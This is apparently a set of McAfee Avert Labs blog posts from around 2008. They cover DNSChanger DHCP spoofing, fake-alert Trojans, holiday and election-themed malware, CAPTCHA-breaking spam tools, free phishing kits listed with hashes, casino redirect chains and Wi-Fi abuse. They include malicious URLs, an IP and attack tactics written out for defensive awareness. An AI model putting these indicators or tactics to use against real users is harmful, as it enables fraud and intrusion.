The environment of fear and anxiety in consumers that is being caused by the downturn also provides opportunity for cybercriminals to lure consumers into what they think are ‘internet sales marketer’ positions, where they are actually unknowingly assisting in criminal activity as money launderers. We have been seeing an increase in the number of these job postings and recruitment emails promising job seekers will ‘get rich quick.’ The scams are also strategically worded to place high on Google job searches, and are of course designed to look like legitimate job postings.

It is more important than ever that computer users educate themselves in safe searching and safe computing habits. Technology alone cannot solve the problem. Education alone cannot solve the problem. Both combined, however, can enable us all to use the Internet the way we want.

Download your copy of the report here.

Educate. Advocate. Protect.

Earlier today SANS posted an excellent blog on a recent variant of a DNSChanger Trojan. There are some significant implications to this threat, but before I go into those, here’s a brief rundown of the main DNS-changing Trojan tactics used to date:

1. Modify Windows Hosts file to map specific domain names to specific IP addresses (McAfee classifies these Trojans as QHOSTS Trojans, more of a precursor to DNSChangers
2. Modify Windows registry settings to reference specific (rogue) DNS servers [DNSChanger.f]
3. Create a scheduled task under Mac OS X to reference specific (rogue) DNS servers [OSX/Puper]
4. Exploit cross-site request forgery vulnerabilities in routers to overwrite the DNS server configuration offered to local area network clients [DNSChanger.f]

We’ve now seen a new tactic, which has the potential of impacting most devices on the local network–independent of the operating system or device (Windows, Linux, Internet-capable MP3 players,  digital picture frames, refrigerators, you name it). The tactic involves serving the rogue DNS server configuration over DHCP, the protocol responsible for distributing dynamic IP addresses, as well as other information, including DNS settings.

Here’s a scenario:

• Jill is using the free WiFi access point at her favorite coffee shop from her infected Windows laptop.
• Steve sits down at the next able and fires up his laptop, which requests an IP address over the wireless local area network.
• Jill’s PC injects a DHCP offer command to instruct Steve’s computer to route all DNS requests through a rogue DNS server.
• Steve fires up his web browser and navigates to his favorite social networking site, but while the browser displays the correct URL name, the rogue DNS server has actually directed the browser to another site.

The same applies to any local area network (LAN) where multiple system connect via DHCP.

This is significant for several reasons:

1. The DNSChanger/Puper/Zlob gang has been very successful, infecting millions of PCs during the last couple of years. This gang typically uses strong social engineering to entice victims into installing the malware.
2. Systems that are not infected with the malware can still have the payload of communicating with the rogue DNS servers delivered to them. This is achieved without exploiting any security vulnerability.
3. Locating a poisoned system on a sizable network is often a difficult task.
4. Noninfected systems can alter between using approved DNS settings and rogue settings based on an infected system being on the LAN, and a random chance that the infected system will be able to “poison” the DCHP offer.

For those interested in the details, this DNSChanger variant drops the legitimate ArcNet NDIS Protocol Driver in the drivers directory:

• %WinDir%\system32\drivers\ndisprot.sys

The Trojan uses this driver to inject DHCP Offer packets containing the rogue DNS server IPs.

Variants using this functionality are not known to be widespread at this point, though even a single infected system could potentially impact hundreds of other systems on the LAN. Though it’s awkward to check, users could examine their DNS settings to see if they have been impacted. For example, type the following from a Windows command prompt:

ipconfig /all

For insight into some of what the DNSChanger gang is after, see this post.

Fasten your seatbelts, for today we take you on a tour of fake-alert Trojans that have been doing rounds in the Internet lately. On this tour of various malware stations you’ll be taken to a system infected by a fake/rogue anti-virus application. Below is an example of a method implemented by such malware to infect a machine.

Here is your itinerary:

Station 1: Malicious web page that hosts a malware
Station 2: Browser helper object
Station 3: Fake/rogue anti-virus application downloader
Destination: Fake/rogue anti-virus application–infected system

The journey starts with a malicious web page that hosts a malware. Users reach these malicious pages through social engineering techniques such as a link via email/instant messanger, or redirection from a compromised legitimate website. A single click on these links will start the infection.

Upon visiting the malware-hosting web page, the user “buys a ticket” in the form of an executable file downloaded onto the system through some social engineering technique.

On our example tour,

• http://best[blocked]tube.net

When users visit the page above, they’re asked to download wmcodec_update.exe, which pretends to be a codec plug-in for Windows Media Player. A message box pops up repeatedly until users download the fake plug-in file, which is a Multi Dropper malware.

Upon execution, the downloaded file pops up a fake error message, as shown below:

The malware continues to execute and drops

1. Browser helper objects
2. Fake/rogue anti-virus application downloader

Our “tourists” now move to the next station, the browser helper object. At this station, the victims’ browsers are compromised. For example, a user’s search queries are manipulated to contain a link to another malicious web page. The following two images show the difference between a “clean” search and one made after a link to a malicious web page has been injected by the browser helper object. I have highlighted one malicious site; try to find five differences between the two images.

Before injection of the URL:

A compromised browser–after injection of the malicious URL:

Many spyware applications use browser helper objects to capture the surfing habits of users. This information is used later by the malware authors for pop-up ads relevant to search keywords, for example.

The next station on our tour is the fake/rogue anti-virus application downloader. Here users see two magazines, which are links to porn sites, on the desktop.

The fake application is downloaded without user intervention by the “fake” downloader. Finally the users systems are infected with a fake application malware.

At this point, users see a bogus alert from the fake application.

Scanning through the report generated by the fake app reveals that this report is exaggerated and false.

The fake-alert malware displays spurious alerts to entice users into buying products to “repair” the system from the fake, exaggerated threat.

Did you enjoy your fake-alert tour? Today, malware often work as a team to infect computers. In this tour, we saw a malicious web page hosting malware, Multi Dropper, a browser helper object, a downloader, and a fake alert work together for a common goal.

As always, we advise you to take precautions with fake plug-in downloads that loop infinitely–without giving you a chance to close that message box. Try to kill such processes of spurious messages through the Task Manager. Be careful about the links in your email, especially in anonymous mail and links in instant messages. Always practice “safe surfing,” which is the first step in keeping your computers clean.

It’s déjà vu again when Internet scamsters take advantage of the approaching Christmas holidays to entice computer users into opening malicious emails in the guise of holiday promotions or postcards. In the runup to Christmas, every year we see malware authors use varying themes to infect users. And this December is turning out to be no different.

Already into the first week of December, McAfee Avert Labs has observed two active spam campaigns using  malware-laced Christmas themes. The first is a spammed e-greeting that links to an IP address hosting an old school IRC/Bot SFX package. The animated image in the email is taken from a legitimate site while the bait IP address [202.82.11.4] belonging to a compromised web server based in Hong Kong.

The second threat is a new worm christened W32/Xirtem@MM. This worm has a built-in SMTP engine that mass mails copies of itself to email addresses harvested from an infected machine. It uses subjects ranging from Hallmark E-Cards to McDonalds and Coca-Cola Christmas promotions. And to lend authenticity to the email, the images displayed in the spammed email are directly borrowed from the parent websites of Hallmark, McDonalds, and Coca-Cola.

The worm also has the capabilities of spreading via removable storage devices and peer-to-peer networks. Upon execution, it displays the above picture to trick users into believing that it was a harmless image file.

The upcoming 5453 DATs to be released today contains detection for the W32/Xirtem@MM worm while users of McAfee Artemis Technology are already protected in real-time against these type of threats

In the coming weeks, these tactics will tend to evolve rapidly, from crude to sophisticated, as spammers increasingly use Christmas based themes to lure victims. With the level of sophistication seen in today’s threats, the malicious payload could easily be hidden within layers of obfuscation or clever social engineering, and could fool even the savviest of users who try to inspect an email before opening. It is therefore imperative that users are educated on how to avoid becoming a victim. Visit the McAfee Security Advice Center to learn all about online and computer safety tips to help you stay protected.

Today marks another day of momentous change for McAfee’s research teams.

I just spent two days with my new colleagues from Secure Computing and some of my team members from McAfee Avert Labs. It was two grueling days of discussion and education as we both came up to speed on our research methodologies and technologies. Let me say that I am truly excited to be working with Dmitri Alperovitch, Sven Krasser, and Paula Greve, who head up the research group there. These are sharp and capable research leaders who have done amazing things. TrustedSource is a great technology and has so many applications that McAfee can leverage. Once our new Artemis technology begins to leverage TrustedSource capabilities McAfee will become the undisputed leader in security intelligence in the Internet “cloud.” Together we will see millions of spam messages, evaluate thousands of web sites, and see thousands of new pieces of malware–all in the span of 24 hours. We now have the ability to see and react to the threat landscape better than ever before. This is something that every McAfee product, technology, appliance, and SAAS (software as a service) solution will come to leverage, differentiating themselves from the competition even more.

At first we thought we would have overlapping technologies, but this is definitely not the case. In combating spam, web, and malware we have approached these threats from very different directions; thus we find our technologies very complementary. In the case of anti-spam protection, for example, we have two technologies that provide better than 99% detection using very different methodologies and approaches. Once combined, we will have the most robust solution on the market. The same holds true for the SmartFilter and SiteAdvisor technologies, as well as our malware solutions.

Today we have very good security intelligence. Tomorrow, with a bit of nurturing, we will have great security intelligence.

We welcome Secure Computing to the McAfee research family.

Jeff Green
Senior Vice President
McAfee Avert labs

You may have read in the press recently about landfill ISP McColo being de-peered. Spam is just part of this story, though probably the most visual and media friendly, please don’t see this ongoing situation as mostly spam related. Spam is simply the most visible tentacle of this octopus.

Our esteemed blogmaster Ed has been moaning about getting something on the blog about it & I wanted to dig out something meaningful for our readers so I contacted a close partner of ours and got some real mailserver stats.

Quite the haircut I’m sure you’ll agree.

You can read my previous blog about bots calling home to mother-ships (often via proxies) if you’re interested as to why this had such a sudden and dramatic effect.

Enjoy the lower load averages while they last though

This is no reason to rest however, we’re still as busy as ever in the labs and we’re watching as intently as ever. The child porn sites are already on a transatlantic move for instance and we’ll be calling our colleagues at the IWF today for sure.

Look what we ran across in our spam traps recently:

$50 for a survey! It’s our unlucky day…

[Click for full size]

As you can see from the partially obscured email address it is clearly NOT from JP Morgan Chase!! I hope this variation on the theme is suspicious enough to set off most peoples “too-good-to-be-true” radar. We can expect this type of attack to get much more convincing real soon no doubt.

Following on from Pedro’s blog yesterday [Election day is over] and the recent news that the computers of both Campaigners were hacked during the summer [Security focus blog], I wanted to give you a short overview of the different Malware we saw here at McAfee Avert Labs during the US Presidential race.

Due to the high media attention which Barack Obama received, it seems that the Malware Authors specifically targeted him instead of John McCain as a means of luring users into clicking on the Malware.

One of the first pieces of malware we saw which exploited the campaign was in August. This was a spammed email which contained a link to get_flash_updates.exe . The email contained the subject “Obama bribes countrymen to win votes”, if the user followed the link it would download Get_Flash_updates.exe which was a BackDoor-DNM Trojan.

The above was similar to a spamming campaign which Alex Hinchliffe blogged about earlier on this year [Super Wednesday].

A few weeks later we received a file called Obama_*.exe (I renamed the file due to it containing offensive language) which was detected as PWS-Banker.cs. The file used the Window Media Video icon and upon execution dropped the following file: %WinDir%\system32\siemens32.dll. The malware also loaded a video in order to make the user believe that it was in fact a video file.

Yesterday we received a file named BarackObama.exe which Pedro blogged about [Election day is over]. We also went Low Profile on the Generic PWS.y!6F939359 which was being talked about on several different sites [Washington Post] [NetWork World]

Finally today we also received a new one which was named Beat_Obama_178.exe. This was a simple downloader which attempts to download a file from a Chinese website. This will be detected as Generic Downloader.Z in tomorrows Dat release.

We expect to see several more malicious files using the US Presidential election as a means of Social Engineering in order to trick users into executing them. So please be on the look out and keep your security software up to date.

I never thought I’d see the day!

ICANN found it’s dentures down the back of the sofa and taken a bite out of the criminals domain registration empire. ESTDomains will no longer be a registrar as of Nov 12th. [pdf]

So I’ve got a question… Who’s got the balls to take on ESTDomains problems “customers” ?

“ICANN Seeks Expressions of Interest from Registrars to Receive Bulk Transfer of Names from De-Accredited Registrar EstDomains”

I recently presented at APWG to encourage the anti-phishing community that registrars and registries can actually act rather than pleading innocence or the classic “our hands are tied” type excuses. In the case of fast-flux they are probably the only ones that can help in fact. I encouraged participants to point out that registrars and registries are guilty of acting illegally in many jurisdictions by facilitating illegal or infectious sites.

The general stance was that if Directi can clean them out then so can anyone else.

I pointed out that between 2 registrars (EST and Klik/Vivids) about $1.5M of revenue had taken place with Directi (who gives a healthy proportion of it to Verisign Etc…). I concluded with a slide to motivate participants to “Hug a Registrar” and I implore our readers to help out too. Anyone scoring over 30% on this uribl page is a prime candidate for advocates in the community to reach out and “help”.

So here is my top 5 for today:

#1 Moniker – Infested with spammers and pirated software sites. (MSOffice isn’t €79.95 delivered in a zip file)
#2 XIN NET – This is where the Pill spammers moved to and have given the .cn TLD a bad name.
#3 35 Tech & OnlineNic – Same as above but with more variety in pill sites and some casinos thrown in too.
#4 Planet Online – (Surprised to see them so high) Home of the unique URL “snowshoe” spammers ? almost legit ? The real world doesn’t care for their bulk and whois protected domains (via directi’s Logicboxes), or fake contacts.
#5 Dynamic Dolphin – Owned by Scott Ricter’s Media Breakaway, formerly bankrupted OptinRealBig . MS won cases against him in New York in 2005. This accreditation is probably against ICANN’s policy. These days they generally annoy via social networks.
#Bonus – *.directNIC [Mikko's open letter]

This is almost 2 years too late and took far too much media attention to shake their tree. The worst of the criminals left EST for other registrars after the “defecation meets the rotary oscillator” in August, but never the less, that (so I’m told) this is quick for ICANN

Hip Hip…

Last week, along with 1,200 other attendees from 47 countries, I was in Las Vegas at the FOCUS’08 McAfee Security Conference. In my opinion it was a great success; here are some on-the-spot comments.

On Tuesday, after the welcome session in which McAfee CEO Dave DeWalt announced, among others, the McAfee Initiative to Fight Cybercrime, I chose to hear my colleagues Toralv Dirro and Pedro Bueno present the state of cybercrime around the globe. In this session, the participants learned the actual methods used by cybercriminals: identity theft, phishing, password-stealing Trojans, virtual money laundering, and botnets. “The cybercrime industry is still booming,” the speakers explained. “It moves about US$100 billion per year and is the most successful sector of organized crime, growing 40 percent per year.”

Fortunately, the criminals do not win all the time. A supervisory special agent attached to the FBI Cyber Division gave us proof in the next session. Through example of “Alonzo X,” we learned how the police forces work to catch cybercriminals. Organizing and offering to sell parts of his botnet consisting of approximately 100,000 infected computers, Alonzo was responsible for sending thousands of spam between 2004 and 2007.

During this track, we learned that, as they do for drug rings, the FBI investigators infiltrate criminal operations. And they are sometimes on the horns of a dilemma: To help the inquiry, do they have the right to use for themselves a botnet they purchase and can they send themselves spam? We also learned how it was sometimes possible to calculate the fine by considering the expense for a computer repair ($200) and multiplying that amount times the number of infected computers. The police’s role is also to inform the victims that their computers are infected. It is not an easy task when you have a worldwide network of thousands zombie machines. Someone in the audience asked the agent how much Alonzo earned; the response was approximately $80,000 per year.

In the third track I attended, participants learned about the views of the U.S. Department of Homeland Security. To introduce his talk, Brett Lambo, the Director of the Cyber Exercise Program, gave us a brief outline of the situation: Today malicious insiders and cybercriminals have both the capabilities and the intent to use the Internet as a playground. Other nations, which also have the capabilities, may have the intent, while terrorist groups may have the intent but do not possess capability. Then, Lambo explained America’s cyberinfrastructure serves as a vital link among 17 critical infrastructure and key resource sectors, as well as providing a fundamental element of all emergency response operations at the federal, state, and local government levels. Since 85 percent of the critical infrastructure in the United States is owned by the private sector, this unity between the cyber response community in the government and private sector will be essential to effective protection and defense.

On Monday afternoon, I was busy with my own session: “Malware on Second Life–Myth or Reality?” As businesses begin to embrace virtual worlds, there’s more and more money involved. I conducted some research on this platform to demonstrate that Trojans, worms, phishing, and counterfeiting activities were not a myth. Here’s one incident I found: Two teenagers, 15 and 14 years old, have been convicted for virtual theft in the Netherlands. They had stolen a virtual amulet and mask in the multiplayer RuneScape game by forcing another player to transfer the items under the threat of violence. One defendant was sentenced to 200 hours service, the other to 160 hours. Yes, threats in virtual worlds are a new cause for concern.

One of the Wednesday events was the talk by colleagues George Kurtz and Brian Kenyon (”Hacking Exposed Live 2008.”) The conference room was just large enough to accommodate all the people wishing to see the live demonstration of today’s most advanced attacks and exploits. Perhaps some attendees found this report too technical. For my part, I thank the authors for the 140-page booklet they offered to all the participants.

Also that day I could not miss the report by Joe Telafici (one of my managers and vice president of operations for McAfee Avert Labs) on the “Economics and Finances of Cybercrime.” After a well-documented threat report that demonstrated the business sense of cybercriminals, Telafici explained that we had to “change the equation” by reducing rewards and making the web harder to use for criminals. “We need a multifunctional, cross-discipline, standards-based approach at fixing the protocols and applications [TCP/IP, DNS, SMTP, HTTP(S)] that make up the Internet,” he concluded.

I started Thursday by participating in the Craig Schmugar track on “Sō’shəl Ěn’jə-nîr’ĭng.” Social engineering is one of the most successful tactics attackers can use in committing cybercrime–by enticing a potential victim into performing a distinct action. After some examples, my Avert colleague explained that crimeware defense strategies were rarely discussed in public. First, they concern the trade secrets of the anti-malware industry; and, second, they could help criminals in their bad work if they were circulating. Social engineering defense, however, is a bit different. Schmugar discussed social engineering characteristics (source, destination, circumstance, content type), inspecting metadata (freshness of content, file names, extensions, path, ADS, web domain and site names), considering static binary properties (container, file size, icon, use of “obscure” functionality and digital signatures) and considering the environment (service names and description, registry references).

Also on Thursday, the Dmitri Alperovitch talk grabbed my attention, and I did not hesitate to congratulate him after his presentation. The subject was “Organized Online Criminal Enterprises: Profile of Who, Where, and How.” Alperovitch offered an impressive list of criminals from Eastern countries (with supporting photos) involved in all sorts of cybercrime. It is easy to understand why the Alperovitch presentation now available on the Internet has many deleted sections. Seemingly, the crooks are all Russian or Ukrainian; and of course they use WebMoney. His example of stock manipulation was also very explicit. With some professional spammer tools and an Internet application able to manage “Exact Buy/Sell signals,” Alperovitch demonstrated that it is not difficult for a crook to make money. In his example, the “buy” flag for a peticular penny stock was fixed to $3.45 and the “sell” flag was set between $3.90 and $3.95. When the spammer launched his campaign, the stock cost about $3. The whole deal took just 8 hours, from purchase to sale. By manipulating 100,000 shares, the profit reached $50,000.

Now I am heading home to France preparing to inform my family about all the interesting and festive events I saw. See you next year at FOCUS’09!

I am in Las Vegas for the McAfee Focus ’08 conference, and I just heard that French President Nicolas Sarkozy suffered, in September, a case of online bank fraud on one of his personal accounts.

Authorities said hackers were not aware of the identity of the owner of the account. We know only that they removed small amounts of money (an anonymous well-informed source told Agence France Press it was for opening mobile phone accounts). Perhaps by taking small amounts the crooks wished to ensure the validity of the stolen information and wished to verify the victim’s lack of concern. But they couldn’t have picked a worse target. The entire French police force is chasing them.

It is difficult to imagine my president as victim of phishing, but anybody can be attacked by crimeware while browsing the Internet via a not well protected computer. Remember, it is not necessary to visit inappropriate web sites to catch malware. In December 2007, for example, I explained in this blog that the site of the French embassy in Libya was affected by an IFRAME injection.

The most probable origin of Sarkozy’s identity theft is “carding.” As I wrote in May, dump tracks lists are for sale by the thousands, and many hacked credit card readers are on the market. Perhaps one of them involved Sarkozy’s credit card during one of his numerous foreign travels.

Relating to this fraud, Luc Chatel, secretary of state for consumer affairs, said there has been a 9 percent increase in Internet banking crimes this year in France.

Issue 5 of the publication formerly known as Sage has been released. This issue we take aim and tackle the rather murky subject of social engineering. We have nine excellent articles for you from some of our finest researchers as well as two academic experts. Some of the topics covered include:

The Origins of Social Engineering
Social Engineering 2.0 – What’s Next?
Vulnerabilities in the Equities Markets
The Future of Social Networking Sites
Typosquatting – Unintended Adventures in Browsing

Many aspects of social engineering are dissected and investigated as well, some not found anywhere else! Definitely worth the download and read.

Available here.

We’ve already written about CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart), the mechanism used to protect web sites, forums, and mailing systems against the automatic creation of accounts and contents. As my colleague Tad Heppner wrote in his November 2007 post, most common CAPTCHA systems work by generating distorted characters, text, or pictures that can be easily recognized by the human brain but present significant difficulty for computer-based optical character recognition or other image-recognition systems.

It should come as no surprise, however, that spammers continue to try to crack CAPTCHA. We’ve now seen a new version of a professional spammer tool on the web. XRumer 5 sells for $520 and promises advanced CAPTCHA decoding methods.

For a long time spammers have searched to defeat CAPTCHA mechanisms to create fake email accounts to send spam. Before telling you more about this new crooked utility, let’s review some older techniques used by spammers.

As shown in the following image (source XMCO), the most common CAPTCHA methods can be broken.

The first method of cracking is manual. People from developing countries offer services. The competition is intense. On some dedicated forums, proposals surge in from Vietnam or Bangladesh. They claim that lots of people are ready to work 24 hours a day to process hundred of thousands of CAPTCHA. Rates vary from $8 to $1 per 1,000 CAPTCHA.

A less expensive solution consists in using private individuals to do the work free of charge. I am sure some readers remember this unusual offer, in which it was possible to undress “Melissa” in exchange for some CAPTCHA work. This allowed a spammer to create fake Yahoo Mail accounts.

It is also possible to find free web services. The CAPTCHA Killer web site offers such services. Its designer claims the offer “is 100% focused on increasing accessibility on the Internet” for the “1 Million Americans that suffer from blindness.” The service makes available an API to automate the process. However, I was not surprised to read a cross-reference on that site saying they have been notified that using CAPTCHA Killer with Myspace was against the latter’s Terms of Service.

A very technical approach uses rainbow tables, in which each CAPTCHA image is associated with its character string. In March 2008, someone nicknamed Maluc created PHP scripts to download, extract, and save thousands CAPTCHA images from Yahoo, Google, and Hotmail. When finished, each collection will help spammers create new recognition tables or verify the accuracy of its OCR algorithm. When successful, only one millisecond is needed to compare a new footprint with the ones included in the database. You have to pay between $1,500 and $5,000 for such algorithms, which suppress the noise, create a black-and-white picture, break it into segments (one letter per segment), and identify the character.

A programmer called Wangrun in the Chinese province of Anhui says he developed software to decode CAPTCHA systems. Depending on the complexity of the CAPTCHA image, he charges between $500 and $6,000 per decoder. No price is quoted for the most difficult images but, in a comment, he writes it is feasible. Wangrun declines to say what his customers use the decoders for, but says he has “very many” of them.

Spammers can also use zombie machines to help them crack CAPTCHA. We’ve read on the Virus Bulletin web site that compromised systems making up a large botnet were recently used to help in the registration process for Windows Live Mail accounts. When the bot (detected by VirusScan as Generix.dx) asked for registration, it received a CAPTCHA and immediately presented its image to a central server that attempted to decode it and returned the result. The decipher technique was successful only around 35 percent of the time, VB said, but a new idea was launched. The fact that large numbers of infected systems were running repeated attempts suggests a high number of new accounts for spamming were created at that time.

Finally, turnkey tools are another method for defeating CAPTCHA defenses. XRumer 5 is one of them. It can flood message and links forums, guestbooks, blogs, wikis, etc. It automatically finds and fills in required fields with no need of a browser. If the forum requires registration, the program will register, log in, and post the spammer text. XRumer goes beyond JavaScript protection, pictocode protection (typing a number displayed in a box), and protection by e-mail activation. If a CAPTCHA image is detected, the program automatically downloads it, analyzes it, and fills in the form.

Version 5 can work on most recent versions of popular engines such as VBulletin, IPB, and phpBB, according to its creator. XRumer can also create accounts on gmail.com for posting. And its clients seem happy. One of them wrote last week on a forum “all that for only $500? It’s very cheap! I’d easily charge 2k for that. Solving gmail captcha is no joke. I paid 4k just for that from an OCR developer. …”

XRumer is also able to solve the “pick the cat captchas” presented in picture below.

On October 3, XRumer’s maker explained he analyzed many forums and discovered that most of this type of CAPTCHA used identical pictures. Thus XRumer can distinguish them by their sizes in bytes. And it concludes: “It’s so easy, isn’t it? Oh, they can make some distortion on images? Well, we have a time to improve our algorithm. We analyze forums, blogs, guestbooks permanently, and there is one important thing: that type of captchas used not more than 0,01% of resources (1 of 10,000 sites).”

Once again, we are reminded that malware design is a business. And once again, my searches drive me to Russia, where criminals create and employ malicious software as well as engage in identity theft and virtual prostitution. The company or individual behind XRumer appears to be the same as that which proposed an automated sex-talk service called CyberLover.ru in 2007. One name I got from a whois request today is Alexander Ryabchenko. When the media pointed the finger at him in 2007, Ryabchenko emailed to Reuters that he could not be accused of identity theft with the CyberLover concept. He explained “the program can find no more information than the user is prepared to provide.”

If anyone should ask Ryabchenko why he commercializes XRumer, I suggest he repeat the CAPTCHA Killer web site argument: to help the million people suffering from blindness.

Q: How do you want to build a client base for your phishing kits?
A: Give the popular ones away for free. Yes FREE, and as blatantly as possible, with one-click satisfaction, right on the homepage of a web site.

I suspect that this is a shareware-style, lead-generation setup–as the phishing kits appear to be of relatively poor quality. (So poor in fact that I expect the most experienced brands to be sending takedown notices for them before the phishing emails were actually sent.) Some of the kits also appear to have encoded parts indicative of being backdoored, too–I guess they gotta pay the hosting bill somehow!

Kudos to the host in Germany for taking down the site next day; you know who you are.

223ad6770c4ff635083b70391d3c04de Abbey[1].Co.Uk.zip
f34e8ce8e373796a30dc7e0730c4ed9e Bank of Israel (2008).rar
799c1ba68e87a33aa225655931996f1f BankofAmerica[1][1].Com.zip
76282eea7ab203c51b05c660577a4002 Cahoot[1].Co.UK.zip
880a57f271d4d46da92738e3962e49b1 E-Gold[1].Com.zip
fa1a96c0b1927177b2ca2c8bd6c5e970 HSBC[1].Co.Uk(CC Info).zip
376bd1c17baa77a870e12747338fe64a HaliFax[1].Co.Uk.zip
a190290c4643d95fb87537856474e84f LloydsTSB[1].Com.zip
0c23bed37791a123e7635cef153d21f9 MoneyBookers[1][1].Com.zip
c5d10b25075e4298bf098dc253a408e6 New paypal.rar
ad7e3dd00939eb5e8d56092aaa0e24bc Padeel.rar
499626e041c80bdec9f80be29364b1b7 PayPal[1][1].Com(T).zip
5eec8797fc8174bf432ddce192d1b1d4 PayPal[1][1].Com.zip
89e94a1843c25dc6424cf542573a4b01 UsaBank[2008].rar
36be827f4ee6e494ee1935556ab3a2a7 Wachovia[1].Com.zip
e1ba19f799d604656ebd4dd9c8228913 Westren nion 2008.rar
62f99023b12214ecac05cdf0ad0b82fe ibank.barclays.co.uk2008.rar
ee89d38f27deb6c94391c764913d9490 scams-orange.zip
afcef45174c5b1ec54db3e8bccfd285a usa.visa.com.rar
6c9030c9c5af0b9343ef72eb458641fd www.Free.Fr.rar
66671d90a86f618522a64caba5bc91a8 www.ebay.co.uK2008.rar
dbfb0c80bada183e47ae031ebb535116 www.paltalk.com.rar

There is an interesting back story to this incident, too: All roads of further investigation lead back to France. The details of which have been with the national police for some time now (thus the delay in posting).

The casino spammers have been chaining together a lot of link redirectors recently to avoid being taken down by redirector sites checking anti-spam blacklists.

Here is a good example from one of our partner traps of how you go from one of the most popular torrent forums on the web to a Malta-based casino in one click.

This is the URL used in the email and our starting point:
http://demonoid.com/redirect.php?url=http://tinyurl.com/4nr46h

Here is the redirection chain:
http://demonoid.com/redirect.php?url=http://tinyurl.com/4nr46h
--> 301 Moved Permanently

http://www.demonoid.com/redirect.php?url=http://tinyurl.com/4nr46h
--> 200 OK (and stops if you’re using LWP)

HEADER : Refresh: 0;url=http://tinyurl.com/4nr46h

GET http://www.spinpalace.com/index.asp?a=634991
--> 301 Moved Permanently
(then they hide the affiliate string for some reason)

GET http://www.spinpalace.com/
--> 200 OK

Affiliate 634991, your time is up.

This is not a new trick. Forward-thinking anti-spammers have been reputing against this type of behavior for quite a while, coupled with generic redirector detection. (This mail was three times over our usual deletion threshold.) The issue lies in the fact that some of these links stay alive for days, as it takes a long time and a lot of effort for the redirect sites to clean up the working redirectors. Spammers don’t re-try tricks like this without reason, however.

If any readers are going to be at MAAWG next week, be sure to say “Hi”!
(Slacker Ed. is going too!)

People don’t seem to seriously care about Wi-Fi security yet. Inspite of oft-repeated warnings, ignorant folks with unlimited bandwidth plans believe that they are doing a social service by allowing neighbors to leach their Wi-Fi freely. What they fail to understand is that by doing so, they can become an unwitting accessory to cyber crime.

Instead of scouring for anonymous proxies to stay faceless on the internet, cyber criminals are increasingly targeting unsecured Wi-FI networks to get the job done. A combination of war driving tools such as NetStumbler along with a listing of default router usernames and passwords is all it takes to freely connect to unsecured Wi-FI networks. Especially since most Wi-Fi routers use default security settings that come pre-installed by the vendor rather than it having being configured by the end user.

SOHO routers log every connection and DHCP lease but these logs are flushed once the router is rebooted. If an attacker has access to the administrative console of the router (thanks to the default password), once their nefarious actives have been carried out, a simple restart of the router will erase all tracks.

The extent to which an unsecured Wi-Fi connection can be abused is purely left to imagination of the attacker. Putting on my Dr.Evil hat, here are couple of wicked acts a Wi-Fi hacker could commit and get away undetected using an unsecured network.

• Download child pornography
• Download copyrighted movies and music via P2P
• Download Warez and abuse your bandwidth
• Send bomb hoaxes, terror or threatening emails.
• Send spam (sexual aids, pharmacy or money laundering scams)

Any of the above acts could lead to law enforcement authorities knocking on your door. This is not mere speculation and many unsuspecting people have fallen victim. To quote a high profile example, in the recent serial bomb blasts in India, terror emails that took responsibility for the blasts were sent from unsecured Wi-Fi connections. And it was the unfortunate owners of the unsecured Wi-Fi connection that were subjected to police questioning and house arrest.

In addition to using an unsecured Wi-Fi network for malicious purposes, an attacker can also use it to steal personal information for identity theft. For example:

• Infiltrate and break into internal machines
• Modify DNS settings on the router to point to a rouge server.
• Sniff Wi-Fi traffic for usernames and passwords

The above discussed scenarios are neither speculation nor an exhaustive listing of different ways for abusing unsecured Wi-Fi networks. These scenarios are being enacted by criminals everyday around the world.

Now why would want to be an unwitting host to criminal activities emanating from your IP address or make yourself vulnerable to identity theft? Be a responsible Netizen and please secure your Wi-Fi connection now!

Inspired by Igor’s post (and whilst Terry is dancing in doorways) I’ve taken some time out from my current project and beaten a path through the tangled web of service providers, registrars, resellers and registrants of the domain name system supporting the darker side of the web.

This investigation originally started when Garth from Knujon pointed out that Directi have some shill registrars on their books (Whilst I was enjoying the Kaiser Chiefs @ Rock en Seine in Paris no less). I then read Brian Krebs post about Atrivo being one of the best known dangerous networks around… He finished with a teaser note about ESTDomains. So guessing whats coming next I’m going to jump the inter-networking gymnastics that binds EST with Atrivo/Intercage/(cernel|inhoster)/Etc, privacy services and others and start at the far end of the story and expose a secret about a not-so-little Indian company called Directi and shine a light on the almost invisible but vital service that powers the domain registration core of the largest group(s) of bad-actors on the web today.

Let me provide some bullet points about the Directi Group of companies to get you up to speed.

• Directi are a privately owned Indian company with a reported turnover in excess of $300M USD.
• Directi own LogicBoxes the maker of a product used to manage the registrar relationship with registries.
• Directi own the reseller Resellerclub.com, and the registrar Answerable.com amongst others.
• Directi own skenzo.com a domain typo squatting monetization service.
• Directi’s Logicboxes are responsible for over 3.5M domains, about 45K resellers across 50+ ICANN accredited registrars.
• LogicBoxes has no acceptable use policy (AUP) for their service.

That last point is the weak link in the chain. Directi’s Logicboxes provide domain registration automation services under contract but without an AUP, and to organizations that have an un-holy tie to organised crime at that.

LogicBoxes is a software product or turnkey ASP solution but some simple tests (that I’m deliberately withholding for now) prove that it’s software combined with a backend service and Directi are involved at every stage of the game via it’s service-layer even though it looks on the face of it like they aren’t.

(If you don’t understand the cats-cradle of knotted string that holds the domain name registration system together then blame John Levine as he has admitted it’s all his fault and this slide explains it all, “apparently” ).

So on the the murky world of Registrars also being Resellers and why:
ESTDomains, Dynamic Dolphin, to name but a few are huge Directi resellers, and as ICANN accredited registrars also customers of LogicBoxes too. But as Garths and Brian’s posts show there are also many other “shill” registrars and unanswered questions too. However between them they provide a disproportionate amount of domains that are used for illegal activities and most have a path back to Directi’s logicboxes service. I’d estimate the total to be north of 100,000 domains by now, everything from Social networking spam through illegal pharmaceutical supply to botnet command and control.

There is a metric truckload of publicly available evidence for anyone that still doubts the darkness of their hats take a look at the URIBL listings for the last 5 days for ESTdomains. All the linked domains are sites you do not want to click as they contain spam landing pages, fake anti-mailware, porn with fake codecs amongst other things. Why on earth a legitimate registrar would not monitor uribl’s published information and act on it is completely beyond me.

ICANN don’t help the situation by accrediting registrars without a verifiable legitimate address and well publicized & working contacts. We have procurement and vendor qualification processes that’s a real pain some times excellent IMHO, I’ll ask someone to send them a copy

